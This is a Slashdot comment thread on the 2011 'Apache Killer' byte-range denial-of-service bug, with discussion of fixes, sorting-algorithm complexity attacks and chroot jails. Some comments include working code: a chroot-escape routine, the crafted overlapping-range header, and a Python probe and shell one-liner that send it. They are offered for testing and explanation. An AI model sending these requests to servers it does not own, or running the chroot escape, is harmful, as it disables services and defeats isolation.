Apache Warns Web Server Admins of DoS Attack Tool 82
CWmike writes "Developers of the Apache open-source project warned users of the Web server software on Wednesday that a denial-of-service (DoS) tool is circulating that exploits a bug in the program. 'Apache Killer' showed up last Friday in a post to the 'Full Disclosure' security mailing list. The Apache project said it would release a fix for Apache 2.0 and 2.2 in the next 48 hours. All versions in the 1.3 and 2.0 lines are said to be vulnerable to attack. The group no longer supports the older Apache 1.3. 'The attack can be done remotely and with a modest number of requests can cause very significant memory and CPU usage on the server,' Apache said in an advisory. The bug is not new. Michal Zalewski, a security engineer who works for Google, pointed out that he had brought up the DoS exploitability of Apache more than four-and-a-half years ago. In lieu of a fix, Apache offered steps administrators can take to defend their Web servers until a patch is available."
Re: (Score:1)
Welcome to 2011, not running CGI scripts is a feature (and a good one at that).
Re: (Score:2)
using chroot/jails/containers/zones
Not being a Linux guru, I thought I had heard repeatedly that "chroots do NOT provide security"? Can't someone who pulls off a privilege escalation escape the chroot?
Re: (Score:1)
What about running CGI scripts on a separate virtual machine from the rest of the system? Basically set up a separate web server on that, and have all CGI scripts be executed from there. For access to shared resources, have a "gate keeper" process (or module in the web server) running on the original host which can give out one-time passwords which are then passed onto the script, and which the script can then use to access the resources through that gate keeper. The gate keeper can have a detailed knowledg
Re: (Score:2)
Re: (Score:1)
Web servers run without root privileges so that the server isn't capable of doing overtly harmful things, but it can still modify the things the web server is supposed to modify. That is, it can still mess those up.
If you want to give scripts a separately isolated area, you can use this: http://httpd.apache.org/docs/2.0/suexec.html [apache.org] File system permissions take over from here.
I don't know too much about SQL servers, but couldn't you probably use Kerberos or something instead of directly using database passwords?
Re: (Score:3)
Can't someone who pulls off a privilege escalation escape the chroot?
Yes, he can. Basically, the trick is to do another chroot() into a subdirectory, but without doing the chdir(). The attacker is then in a situation where the current directory is above the new root. From here he can keep doing chdir(".."); until he reaches the real root, and then all he needs to do is chroot(".");.
What's worse, this escape follows from the way chroot is specified, so it can't really be fixed in the kernel.
So yes, you can escape a chroot jail if you've got root. However, the point of the chroot jail
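The steps described above can be sketched in a few lines. This is my own illustration of the classic technique, not code from any exploit kit; since the real thing needs root inside the jail, the `really` flag (my invention) defaults to only returning the plan of calls rather than executing them:

```python
import os

def chroot_escape(depth=64, really=False):
    # The classic escape: chroot() into a subdirectory WITHOUT chdir(),
    # so the current directory is left outside the new root; climb up
    # with chdir("..") past the old jail, then chroot(".") at the top.
    # Requires root (CAP_SYS_CHROOT), so by default we only return the
    # sequence of calls instead of making them.
    plan = (['mkdir("x")', 'chroot("x")  # note: no chdir()'] +
            ['chdir("..")'] * depth +
            ['chroot(".")'])
    if really and os.geteuid() == 0:
        os.mkdir("x", 0o700)
        os.chroot("x")                 # CWD is now above the new root
        for _ in range(depth):
            os.chdir("..")             # ".." at the real root is itself
        os.chroot(".")                 # "." is the real filesystem root
    return plan
```

The `depth` of 64 is just "more than any sane path depth"; repeated chdir("..") at the real root is a harmless no-op.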
Re: (Score:2)
A proper SELinux (or AppArmor, I'd imagine) policy would also serve to confine them in their box.
Re: (Score:1)
Re: (Score:2)
Although, your comment was quite damn funny.
Re: (Score:3, Interesting)
Yes, that's why I use Hiawatha [wikimedia.org].
Re: (Score:2)
They're not even close to comparable. Apache has served me very well. My server is not even vulnerable to this as I don't have mod_deflate loaded or compiled. (I tested using the kill script.)
Re: (Score:1)
The link in the blurb claiming to point to the advisory from Apache isn't correct.
The actual advisory from Apache notes that mod_deflate's presence is orthogonal (irrelevant) to the exploitability of this issue.
The correct link:
http://mail-archives.apache.org/mod_mbox/httpd-announce/201108.mbox/%3C20110824161640.122D387DD@minotaur.apache.org%3E [apache.org]
Re: (Score:2)
Re: (Score:2)
Let's not forget that a proper admin who has Apache locked down with, for example, some SELinux policies makes it a pretty tough nut to crack.
Someone should have attended Secure Coding 101 (Score:2)
Algorithmic complexity attacks (of which this is an example) are nothing new. They have been mounted against badly chosen sorting algorithms (naive quicksort, which is still defended by quite a few people who simply do not get it or are not bright enough to implement the alternatives) and are employed today against, e.g., hash tables. Libraries and languages by people with a clue (e.g. Lua) have protection against that. Others do not.
Writing secure code is a bit harder than writing merely working code. I guess people have t
Re: (Score:1)
This [lmgtfy.com] might be informative.
Re: (Score:1)
Alright, fair enough. Maybe you already know this, but for the benefit of the other readers: quicksort is just fine if you can trust that the data arrives in more or less random order. The problem is that its speedup rests on the unsafe assumption that this is the case, meaning it's really easy to dramatically increase the processing time of a given sort by feeding it data in certain specific patterns, such as reverse order or almost completely reverse order. It generally
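To make the point concrete, here's a toy demo (my own sketch, not code from any library): a textbook quicksort that always picks the first element as pivot does quadratic work on already-sorted input, while random input costs it only a few thousand comparisons:

```python
import random

def naive_quicksort(a, counter):
    # Textbook quicksort with a first-element pivot, exactly the variant
    # that degrades to O(n^2) on sorted or reverse-sorted input.
    if len(a) <= 1:
        return a
    pivot, rest = a[0], a[1:]
    counter[0] += len(rest)                 # comparisons against the pivot
    lo = [x for x in rest if x < pivot]
    hi = [x for x in rest if x >= pivot]
    return naive_quicksort(lo, counter) + [pivot] + naive_quicksort(hi, counter)

n = 400
c_rand, c_sorted = [0], [0]
naive_quicksort(random.sample(range(n), n), c_rand)   # typical input
naive_quicksort(list(range(n)), c_sorted)             # adversarial input
# c_sorted[0] is n*(n-1)/2 = 79800; c_rand[0] is only a few thousand
```

An attacker who controls the input can always serve the adversarial pattern, which is the whole point of an algorithmic complexity attack.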
Re: (Score:2)
Considering the poor choice of a response, you should have checked your links. The first one is "why quicksort sucks", which goes on to explain why a *modified* quicksort algorithm posted on Wikipedia is no better than the original quicksort.
The 3rd link is "why Java sucks", and further down the first page is "why .NET sucks".
If you want to explain issues with an algorithm like that, say what it is, rather than posting a snide lmgtfy link that is wrong for the problem at hand.
So far it seems to me that the pro
Re: (Score:2)
Can't comment on quicksort since it's been years since I was in a CS class, but none of those Google results indicate that quicksort sucks.
Usually you want your LMGTFY to show clear examples that make your case, and none of those links do.
Re: (Score:2)
Who recommends quicksort for anything? It has a bad O(N^2) degenerate case that's been known since the development of the algorithm.
It's my understanding that merge sort or merge/insertion hybrids are what's typically used, since merge sort is O(N log N) for all inputs and is stable, while insertion sort can be extremely fast on short lists (but is inappropriate for large lists, being O(N^2) as well). Other sorts might be chosen if the data is known in advance to have favorable properties for them.
Q
Re: (Score:2)
I guess it depends on how many bytes you have to implement your sort in.
If you're cramming the sort into less than 8 bytes, speed takes a back seat. If you can use gigabytes of memory, you can implement a much faster, more memory-intensive sort.
Re: (Score:1)
Not only that, but quicksort is faster on average-sized inputs, which is what you work with most of the time.
Lower asymptotic complexity doesn't equal speed.
Re: (Score:2)
Sadly, idiots (of which the folks that coded Apache are an example) are nothing new. Their mediocrity has long suffocated us bright folk, many of whom are too timid to call these people what they are: pathetic failures. Others, like yourself, are not.
Achieving perfection is a bit harder than merely rewriting flawed code. I guess people have to experience humiliation over and over again...
Re: (Score:2)
This is a joke right?
Re: (Score:2)
Someone should have attended Spotting Sarcasm 101.
Re: (Score:2)
:) I had to ask. On /. it's not as easy to tell as I would like..
Re: (Score:1)
There are still people who didn't switch to introsort?
Quickfix (Score:4, Informative)
If this was IIS (Score:2)
Imagine the anti-Microsoft shitstorm around here if this was an IIS attack tool.
Re: (Score:1)
Re: (Score:2)
None of these justify the reaction that IIS would have gotten.
Slashdot is vulnerable... (Score:5, Interesting)
All versions in the 1.3 and 2.0 lines are said to be vulnerable to attack. The group no longer supports the older Apache 1.3.
Since Slashdot is still stuck in the late '90s, with a thin veneer of bad JavaScript over Apache 1.3, it's vulnerable... and no patch either.
Re: (Score:2)
Oh, and before you say that Malda & crew will do a deep code analysis of the 1.3 branch and fix it themselves:
1. They're STILL RUNNING 1.3!!
2. Slashcode... QED.
Re: (Score:2)
3. No more Malda [slashdot.org].
Re: (Score:2)
So someone could use this exploit and take /. down. :(
Re: (Score:2)
Maybe they patched it. Or maybe they filter the vuln before it hits Apache; it seems it's just about asking for a large number of ranges in a HEAD request.
A quick summary (Score:5, Informative)
A quick summary: A client can use byte range requests that are overlapping and/or duplicated to use a single small request to overload the server. eg: 0-,0-,0- would request the entire contents of the file three times. YMMV but this has to do with how Apache handles the multipart responses consuming memory and isn't an actual bandwidth DoS.
Unfortunately there are legit reasons for allowing out-of-order ranges and multiple ranges, such as a PDF reader requesting the header, then skipping to the end of the file for the index, then using ranges to request specific pages. Another example was a streaming movie skipping forward by grabbing byte ranges to look for i-frames without downloading the entire file.
So the fix discussion centers on when to ignore a range request, when can you merge ranges, can you re-order them, can you reject overlapping ranges and how much do they need to overlap, etc. The consensus seems to be that first you merge adjacent ranges, then if too many ranges are left OR too many duplicated bytes are requested then the request skips the multi-part handling and just does a straight up 200 OK stream of the whole file or throws back a 416 (can't satisfy multipart request).
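That consensus logic can be sketched roughly like this. This is my own simplified model of the approach described, not Apache's actual code, and the thresholds (`max_parts`, `max_dup_factor`) are made-up policy knobs:

```python
def plan_response(ranges, filesize, max_parts=20, max_dup_factor=2):
    # ranges: list of (start, end) byte offsets, end inclusive.
    requested = sum(e - s + 1 for s, e in ranges)   # total BEFORE merging
    merged = []
    for s, e in sorted(ranges):
        if merged and s <= merged[-1][1] + 1:       # overlapping or adjacent
            merged[-1][1] = max(merged[-1][1], e)
        else:
            merged.append([s, e])
    # Too many parts survive, or too many duplicated bytes requested:
    # skip the multipart handling and serve the whole file (or a 416).
    if len(merged) > max_parts or requested > max_dup_factor * filesize:
        return "200 full-body"
    return "206 multipart/%d" % len(merged)
```

Note the duplication check uses the pre-merge total: merging collapses the overlaps, so only the original request reveals how much duplicated data the client demanded.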
Re: (Score:3)
Shouldn't the fix just be that Apache calculates the _total_ size requested by the client and, if that crosses some definable limit, knocks back the request with an HTTP 4xx response ("client demands too much") or, if it wants to be polite, a 5xx error ("we're not google")?
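The suggested check is a one-liner in spirit. A hedged sketch (my own, with a made-up `budget_factor` knob, not anything Apache ships):

```python
def range_budget_check(ranges, filesize, budget_factor=2):
    # Sum what the client actually asked for across all byte ranges
    # (start, end inclusive); past the budget, refuse the request.
    total = sum(end - start + 1 for start, end in ranges)
    if total > budget_factor * filesize:
        return 416          # "client demands too much"
    return 206              # proceed with the partial response
```

416 (Requested Range Not Satisfiable) is the natural 4xx here, though a strict reading of the status code is part of the debate in the thread above.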
Re: (Score:2)
Re: (Score:1)
Worse than that... even requesting a lot of small ranges can overload the server. The example code (iirc) requested the range 5-,5-0,5-1,5-2,5-3,5-4...5-1299 repeatedly. The real killer though is accept-encoding gzip, which causes Apache to try to zip all of those tiny ranges. That's really what kills the server.
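For a sense of scale, the pattern described packs over a thousand overlapping ranges into one short header line. A reconstruction (my reading of the PoC as described; the exact counts in the real script may differ):

```python
def killer_range_header(n=1300):
    # Pattern described above: "5-,5-0,5-1,...,5-1299".  Every tiny,
    # overlapping range becomes its own multipart bucket on the server,
    # and with "Accept-Encoding: gzip" its own compression context.
    parts = ["5-"] + ["5-%d" % i for i in range(n)]
    return "Range: bytes=" + ",".join(parts)
```

One such line is well under 10 KB on the wire, which is why a single client can generate a crippling memory/CPU amplification.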
Not that bad (Score:5, Interesting)
I read the advisory, chose a course of action, then it took about a minute to make my server not vulnerable. It's great that they made the disclosure.
Re: (Score:3)
In more detail...
Some of the suggestions from the Full Disclosure discussion and elsewhere:
Re: (Score:2)
Oh, and -- sorry -- Apache security advisory [apache.org].
test your vulnerability (Score:5, Informative)
You can do a quick test with something like this:
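(The command itself seems to have been lost in posting; judging from the shell one-liner quoted in a reply below, a rough Python equivalent would be the following. The hostname is a placeholder, and the range count is arbitrary.)

```python
import socket

def build_probe(host, n=100):
    # A HEAD request carrying n overlapping byte ranges plus gzip.
    ranges = ",".join("5-%d" % i for i in range(n))
    return ("HEAD / HTTP/1.1\r\n"
            "Host: %s\r\n"
            "Range: bytes=0-,%s\r\n"
            "Accept-Encoding: gzip\r\n"
            "Connection: close\r\n\r\n" % (host, ranges))

def probe(host, port=80):
    # Send the request and return the raw response headers for inspection.
    with socket.create_connection((host, port), timeout=5) as s:
        s.sendall(build_probe(host).encode("ascii"))
        return s.recv(65536).decode("latin-1", "replace")
```

Only run this against a server you own; even a single probe request does real work on a vulnerable box.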
If you're vulnerable, you should see a really ridiculously long Content-Length header, like 900k or so.
Disabling mod_deflate or the equivalent prevents this behavior, but it's not clear that there isn't another exploit waiting to happen. A super quick fix is to kill the Range header entirely using mod_headers, like so:
RequestHeader unset Range
in your apache.conf or moral equivalent. For the most part, you can get away with not serving Range headers, and if you can't, you know it and don't need my advice on fixing this.
Re: (Score:1)
eg: echo -en "HEAD / HTTP/1.1\r\nHost:www.mydomainname.com\r\nRange:bytes=0-,$(perl -e 'for ($i=1;$i<1300;$i++) { print "5-$i,"; }')5-1300\r\nAccept-Encoding:gzip\r\nConnection:close\r\n\r\n" | nc localhost 80
A couple of my servers have Limit o
Re: (Score:2)
Just wanted to point out that this does *not* depend on mod_deflate or mod_gzip. Those make the problem worse, but the real issue is that Apache sets up a lot of internal data structures to handle the "metadata" of the multipart request. Even with compression disabled, you can still easily overload the server with comparatively few requests, because you're asking Apache to set up thousands and thousands of multipart buckets for each single HTTP request. It doesn't take very many requests to bring everything
Thanks! (Score:1)
Touchpads? (Score:2)
mod_evasive ? (Score:1)
Has anyone noticed whether mod_evasive disarms/mitigates this attack vector?
How to test it against HTTPS? (Score:1)
Re: (Score:2)
Vulnerability first reported in 2007 (Score:2)
With the bug first reported over 4.5 years ago, this was entirely avoidable.
http://seclists.org/bugtraq/2007/Jan/83 [seclists.org]
Indexes (Score:1)
Re: (Score:2)
Recommended webserver for WSGI Python apps? (Score:2)
Since we're discussing Apache anyway... I've used Apache for over a decade now. Right now I'm working on a Pyramid [pylonsproject.org] app and publishing it with mod_wsgi [google.com] on Apache 2.2, for no other reason than that I'm already familiar with Apache. Since this is a brand new project and will be running on its own dedicated server - and therefore doesn't have to play nicely with any pre-existing web apps - I wanted to re-evaluate my decision. If you needed to publish a WSGI app today, what server would you use and why?
Confusion.. (Score:1)
"... and said it would release a fix for Apache 2.0 and 2.2 in the next 48 hours."
"... According to Apache, all versions in the 1.3 and 2.0 lines are vulnerable to attack."
So dropping support for 1.3 I understand (EOL etc.), but fixing 2.2 even though it isn't reported as vulnerable? Which is it?
Re: (Score:2)
I figured it was two different points. The first being that they'd release a fix for 2.x, and the other a less than subtle "Update your goddamn software!" reminder.
4 .5 years before they do something.... (Score:2)
I am glad they finally got to it, but if Apache had told their bank there was an issue with their account, I am sure they would have wanted the bank to do something right away, not 4.5 years later... You just have to hit them where it hurts: DDoS their banks, not their servers...